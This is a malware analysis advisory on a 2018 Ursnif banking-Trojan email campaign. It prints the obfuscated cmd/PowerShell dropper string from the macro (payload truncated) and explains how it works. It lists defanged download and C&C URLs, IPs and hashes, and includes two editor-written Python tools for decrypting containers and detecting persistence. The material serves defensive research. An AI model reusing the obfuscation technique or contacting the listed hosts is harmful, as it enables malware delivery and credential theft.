TG Soft's C.R.A.M. (Anti-Malware Research Center) analyzed an email campaign spreading the Ursnif banking Trojan, sent on March 20, 2018.
Cyber-criminals use social-engineering techniques in fraudulent mass mailings to induce the victim to open infected attachments or click links in the message body.
If you received a suspicious email, send it to C.R.A.M. (Anti-Malware Research Center): How to send suspicious emails
"Ursnif" malware campaign.
Malware family:
Ursnif
VirIT: Trojan.Win32.Ursnif.ET, Trojan.DOC.Dropper.OV, W97M.Downloader.DU
Description:
The email was detected on the morning of March 20, 2018.
Subject: [changes based on the email you receive]
Body (Italian, always the same):
Vedi allegato e di confermare.
(Good morning
See attachment and to confirm)
How it spreads:
It abuses the e-mail accounts configured on the infected PC, sending fake infected replies to messages ALREADY RECEIVED by the victim.
The body of the message is always the same (shown above), while the subject varies because the message is a reply to one the victim actually received, so it inherits that thread's subject.
Attached is a DOC file named "Request.DOC" or ending in "-Request.Doc" (for example "info-Request.doc").
The malicious DOC attachment contains an AutoOpen macro which, as soon as it runs, downloads the malware and executes it.
The AutoOpen macro first runs CMD.EXE, passing it the following string, which in turn starts PowerShell (2018-03-20 campaign; the PowerShell payload is truncated here with [..]):
bjqVWvLV QnTWflfVsJojREFKUjiw nkCtiAvGwuozow & %^C^o^m^S^p^E^c^%
%^C^o^m^S^p^E^c^% /V /c
set %AjpWflGjmopTHFW%=uWfXwUcHhFpDf&&set %ZjoTtBfulCziS%=p&&
set %nzIdmRsRVXh%=o^w&&set %uwlNdsjVYvaRElO%=mjZqKjiZbNfEh&&
set %swXbCoHjVVRkJQ%=!%ZjoTtBfulCziS%!&&
set %pZvDDsqEGdMmWVb%=GtjNSvW&&set %YwzRKUfadQV%=e^r&&
set %hCfcSRbVDET%=!%nzIdmRsRVXh%!&&set %pfkWvEm%=s&&
set %QMUOTLlQNinjWiN%=tYkjGMD&&set %OuRzmiCNwI%=he&&
set %RlNcjvTsc%=ll&&!%swXbCoHjVVRkJQ%!!%hCfcSRbVDET%!!
%YwzRKUfadQV%!!%pfkWvEm%!!%OuRzmiCNwI%!!%RlNcjvTsc%!
"InVOke-exPressiOn(([RUNTimE.inTeroPsERvICEs.MarShAl]::
([runTime.intErOpseRvIceS.mArshal].GeTMembeRS()[4].NAMe).invoKE
[..]
ADUAZQA0ADMAOAAwADEAOAAwADUANQBiAGEANwA5ADYAZgBjAGEANAA4AGEAZQA
5ADIAYQBhADUAMQBkAGEAZgA5ADMAZABmADIANwBmAA=='|
conVerTto-SECURestriNG -keY (22..37)) ) )))
The string is obfuscated for cmd.exe rather than for a human reader. The leading junk command fails and "&" simply moves on to the next one. The caret "^" is cmd's escape character and is dropped by the parser, so %^C^o^m^S^p^E^c^% resolves to %ComSpec% (cmd.exe) and o^w / e^r become ow / er. The /V switch enables delayed expansion, so !name! references are resolved only when each command runs; because the variable names are written as %name% and are undefined when the line is parsed, they stay literal, and the variables really are called "%name%". Most of the set statements are decoys; the six that matter concatenate p + ow + er + s + he + ll into the word powershell, which is then invoked with the Invoke-Expression payload. Neither the interpreter name nor any command fragment appears literally in the document, which is what this layer is designed to hide from signature-based scanning.
cmd.exe then runs PowerShell with this command (truncated):
powershell "InVOke-exPressiOn(([RUNTimE.inTeroPsERvICEs.MarShAl]::([ runTime.intErOpseRvIceS.mArshal].GeTMembeRS()[4].NAMe).invoKE( [rUNTiMe.InTeropservicES.MArShal]:: [..]
The actual script is not in the document in clear text. The long base64/hex string at the end is a ConvertFrom-SecureString -Key container: ConvertTo-SecureString -Key (22..37) decrypts it with a 16-byte AES key consisting of the bytes 22 through 37, and the two [Runtime.InteropServices.Marshal] members, whose names are looked up by index in GetMembers() rather than spelled out, turn the resulting SecureString back into a plain string (in this pattern they are typically SecureStringToBSTR and PtrToStringAuto; the indexes depend on the .NET version, so the sample works only on the runtime it was built for). The decrypted text is then passed to Invoke-Expression. Replacing that Invoke-Expression with Write-Output, or decrypting the container outside PowerShell, reveals the second stage without running it.
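The following is an added example by the editor, not TG Soft's code, that unpacks a ConvertFrom-SecureString -Key container of the kind used here without executing it. It assumes the documented layout of that format (a fixed 32-hex-character header, then base64 of the UTF-16LE string "2|<base64 IV>|<hex AES-CBC ciphertext>", PKCS7-padded UTF-16LE plaintext) and uses the macro's key (22..37). The sample blob is constructed inline and is not the campaign's; AES itself comes from the cryptography package, while parsing needs only the standard library.

```python
"""Unpack and decrypt a PowerShell ConvertFrom-SecureString -Key container."""
import base64
import os

try:  # AES is only needed for decrypt/encrypt; parsing works without it
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    HAVE_AES = True
except ImportError:
    HAVE_AES = False

HEADER = "76492d1116743f0423413b16050a5345"   # constant prefix of -Key output
MACRO_KEY = bytes(range(22, 38))               # PowerShell (22..37): 16 bytes, AES-128


def parse_blob(blob):
    """Split a SecureString blob into (version, iv, ciphertext) without decrypting."""
    if blob[:32].lower() != HEADER:
        raise ValueError("not a ConvertFrom-SecureString -Key blob")
    inner = base64.b64decode(blob[32:]).decode("utf-16-le")
    version, iv_b64, ct_hex = inner.split("|", 2)
    return version, base64.b64decode(iv_b64), bytes.fromhex(ct_hex)


def build_blob(iv, ciphertext, version="2"):
    """Inverse of parse_blob; used here to construct offline sample input."""
    inner = f"{version}|{base64.b64encode(iv).decode()}|{ciphertext.hex()}"
    return HEADER + base64.b64encode(inner.encode("utf-16-le")).decode()


def decrypt_blob(blob, key=MACRO_KEY):
    """Recover the plaintext the macro would hand to Invoke-Expression."""
    _, iv, ct = parse_blob(blob)
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = dec.update(ct) + dec.finalize()
    return padded[:-padded[-1]].decode("utf-16-le")   # strip PKCS7 padding


def encrypt_blob(plaintext, key=MACRO_KEY, iv=None):
    """Produce a blob the way ConvertFrom-SecureString -Key does (for test samples)."""
    iv = iv or os.urandom(16)
    data = plaintext.encode("utf-16-le")
    pad = 16 - len(data) % 16
    data += bytes([pad]) * pad
    enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    return build_blob(iv, enc.update(data) + enc.finalize())


# Constructed sample (not from the campaign): fixed IV and a dummy ciphertext.
SAMPLE_IV = bytes(range(16))
SAMPLE_CT = b"\xaa" * 32
SAMPLE_BLOB = build_blob(SAMPLE_IV, SAMPLE_CT)

if __name__ == "__main__":
    print(parse_blob(SAMPLE_BLOB))
    if HAVE_AES:
        print(decrypt_blob(encrypt_blob("Write-Output 'stage two'")))
```

parse_blob is the part worth keeping in a triage toolbox: even without decrypting, it tells you that a blob is this format and gives you the IV and ciphertext length, and with the key taken from the script (here literally the numbers 22..37) decrypt_blob yields the next stage for static review.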
The PowerShell script downloads Ursnif from
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter1.class and saves it in the folder C:\Users\Public\<number>.exe (for example C:\Users\Public\241520.exe).
When executed, the malware copies itself to a random subdirectory of %USERPROFILE%\AppData\Roaming\Microsoft and sets itself to run automatically by creating a value under:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
[random value name] = %USERPROFILE%\AppData\Roaming\Microsoft\[random folder]\FILENAME.EXE
Ursnif then injects itself into the EXPLORER.EXE process.
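The following is an added example by the editor, not TG Soft's code, that turns the two file-system artefacts above into a triage check: a Run value whose target sits exactly one random folder below %USERPROFILE%\AppData\Roaming\Microsoft, and an executable with an all-digit name dropped directly in C:\Users\Public. The regular expressions and the sample entries are the editor's constructions; on Windows, collect_run_entries() reads the real HKCU Run key, elsewhere it returns nothing so the module can still be imported.

```python
"""Flag Run-key targets and drop paths matching the layout described above."""
import re
import sys

# Run value target: %USERPROFILE%\AppData\Roaming\Microsoft\<random folder>\name.exe
RUN_TARGET = re.compile(
    r'^"?(?:[A-Za-z]:\\Users\\[^\\]+|%USERPROFILE%)'
    r"\\AppData\\Roaming\\Microsoft\\[^\\]+\\[^\\]+\.exe\"?",
    re.IGNORECASE,
)
# Downloader drop path: C:\Users\Public\<digits>.exe
PUBLIC_DROP = re.compile(r"^[A-Za-z]:\\Users\\Public\\\d+\.exe$", re.IGNORECASE)


def suspicious_run_entries(entries):
    """entries: iterable of (value_name, command). Returns those matching the layout."""
    return [(name, cmd) for name, cmd in entries if RUN_TARGET.match(cmd.strip())]


def suspicious_public_drops(paths):
    """Paths under C:\\Users\\Public whose file name is only digits, as the dropper uses."""
    return [p for p in paths if PUBLIC_DROP.match(p)]


def collect_run_entries():
    """Read HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run on Windows."""
    if sys.platform != "win32":
        return []
    import winreg
    key = winreg.OpenKey(
        winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run"
    )
    entries, index = [], 0
    while True:
        try:
            name, value, _ = winreg.EnumValue(key, index)
        except OSError:  # no more values
            break
        entries.append((name, str(value)))
        index += 1
    return entries


# Constructed sample (not real telemetry): one benign entry, one in the campaign's layout.
SAMPLE_ENTRIES = [
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("qzqkwdpl", r"C:\Users\alice\AppData\Roaming\Microsoft\Mnwbsyq\bitstlib.exe"),
]
SAMPLE_PATHS = [r"C:\Users\Public\241520.exe", r"C:\Users\Public\Desktop\readme.txt"]

if __name__ == "__main__":
    live = collect_run_entries() or SAMPLE_ENTRIES
    for name, cmd in suspicious_run_entries(live):
        print(f"suspicious Run value {name!r} -> {cmd}")
    for path in suspicious_public_drops(SAMPLE_PATHS):
        print(f"suspicious drop path {path}")
```

A match is a lead, not a verdict: legitimate software rarely installs an executable one folder below Roaming\Microsoft, but it does happen, so confirm with the file hash (the EXE MD5 list below) and, if the host is already infected, remember that the running copy lives inside explorer.exe and not only at the path the Run value points to.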
Example:
Name: BITSTLIB.EXE
MD5: 3A20CFEFA9EF2EEB8E0BC48F2016587F
Size: 772,608 bytes
Compilation date: 2015-01-15 00:58:27 (PE timestamp; easily forged, so treat it as a hint rather than evidence)
A second macro variant instead downloads the Ursnif banking Trojan from the site http://dqwodnqwdoajndwqdqwdasd[.]com.
Note:
The downloaded malware belongs to the Ursnif family, whose hallmark is stealing login credentials for sensitive sites such as home banking, webmail, FTP, etc.
IOC 2018-03-20 (updated 15:50):
DOC file MD5:
022237484700FED95B425E47C8E65894
28854137C4FA3FF73C36F867F759AB1E
37408744E477E08D9EC4C10F8A9671BD
43C103C0DF16656972E80993172D82D3
445C2BBB192009359B549435AFAF72BA
4491A44BAA33CB8D102A7704D469C79C
4ED22727791E7A7593F6091D54F0B6AB
683C235F7D1CBF548F863B84DC0C67E9
6F784EEDE13B9FDA61DF3E461DACE867
72E69B0BBD5FB4D0D83A7FE4FE8F1234
7B10F167C070654C5D62C501F805CEB2
8B330F4F54CE6B4272C6AEA681D84D1E
A51F64C001A2AA500C9AA174FBB3DEF4
B4B4EEF90D29EEB9CCB14BEF0041ABCD
BBA69D7143B32A4F28D8E55240068009
BD73D4E8BC206E7FA68C658264F82629
C606FC84BF6869ABD31727D9C4B8F299
E0E6AD82EA08C023CE88CD3B4E34141A
EB28EB488F842DAD6F6B96142367F709
EXE file MD5:
14AA6A6F472C9BDA6D7A863CB8ADF842
2DB06886393216B0774BE6757AE1B431
3A20CFEFA9EF2EEB8E0BC48F2016587F
B9E96DC35FBAC25E2A5B958401B09088
URL:
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter1.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter2.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter3.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter4.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter5.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter6.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter7.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter8.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter9.class
http://qwdiqjdauqwdnaqudqawd[.]com/NOIT/testv.php?l=borter10.class
IP: 107.152.196.147
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter1.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter2.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter3.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter4.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter5.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter6.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter7.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter8.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter9.class
http://dqwodnqwdoajndwqdqwdasd[.]com/NOIT/testv.php?l=borter10.class
IP: 107.152.196.147
http://horse-technology[.]com/files/alex.bmp
http://lnx.eridanoweb[.]com/gestioni/header.png
http://playmuseek[.]com/wp-admin/maint/admin.rar
http://fioritononi[.]it/modules/readme.doc
http://voloweb[.]net/assistenze/img/wp-32.png
http://cmxsrl[.]it/wp-32.zip
http://onliva[.]at/jvassets/rk/docs.zip
C&C servers (where exfiltrated data such as passwords and clipboard logs are sent):
https://ijguiqjwhnschbashiwbad[.]net
https://xcnbjasjwehqiuzxc[.]com
http://onliva[.]at
http://fortares[.]su
http://swoqup[.]at
C&C server IP:
47.74.247.229
How to identify a fake email
Experience and common sense are the first defences against this kind of scam.
Careful reading of the email, in all its elements, is essential. Be wary of attachments (ZIP archives and, as in this campaign, Office documents) and, if at all possible, DO NOT enable automatic macro execution. Setting macros to run automatically is strongly discouraged, since simply opening a Word or Excel file would then execute its macros immediately without any prior warning.
If you have been infected by a banker, the advice from TG Soft's C.R.A.M. is to take appropriate precautions even after the affected system(s) have been cleaned, such as changing the passwords you use most on the Web. If the workstation involved is used for home-banking transactions, a check with your bank is also recommended.
How to send suspicious emails for analysis as possible virus/malware/ransomware and/or phishing attempts
Material can be sent to TG Soft's Anti-Malware Research Center for analysis, which is always free of charge, safely in two ways:
- Any suspect email can be sent directly from the recipient's e-mail client to lite@virit.com, choosing "Forward as Attachment" as the sending mode and putting "Possible phishing page to verify" or "Possible Malware to verify" in the subject;
- Save the e-mail to be sent to TG Soft's C.R.A.M. for analysis as a file outside the e-mail program, then upload that file from the page Send Suspicious Files (http://www.tgsoft.it/italy/file_sospetti.asp). If you want feedback on the analysis, you must give an e-mail address and a brief description of the reason for the submission (for example: possible / probable phishing; possible / probable malware, or other).
We give these suggestions to help you avoid credential theft, viruses/malware, or worse, next-generation ransomware / crypto-malware.
Integrate your PC / SERVER protection with Vir.IT eXplorer Lite
If you are not yet using Vir.IT eXplorer PRO, it is advisable to install Vir.IT eXplorer Lite (FREE Edition) alongside the antivirus in use, to increase the security of your computers, PCs and SERVERs alike.
Vir.IT eXplorer Lite has the following special features:
- Freely usable in both private and corporate environments, with Engine+Signature updates without time limitation;
- Interoperable with any other AntiVirus, AntiSpyware, AntiMalware or Internet Security already present on PCs and SERVERs. We recommend using it as a supplement to the AntiVirus already in use: it does not conflict with it or slow down the system, and it significantly increases security in terms of identification and remediation of infected files;
- It identifies and, in many cases, also removes most of the viruses/malware actually circulating or, alternatively, allows them to be sent to the C.R.A.M. Anti-Malware Research Center for further analysis to update Vir.IT eXplorer PRO;
- Through the Intrusion Detection technology, also available in the Lite version of Vir.IT eXplorer, the software is able to report new-generation viruses/malware that have set themselves to start automatically and to send the reported files to TG Soft's C.R.A.M.
- Download Vir.IT eXplorer Lite from the official distribution page of TG Soft's website.
For Vir.IT eXplorer PRO users...
Vir.IT eXplorer PRO owners can also contact TG Soft's technical phone support free of charge. The details can be found on the Clients support page.
C.R.A.M.
TG Soft's Anti-Malware Research Center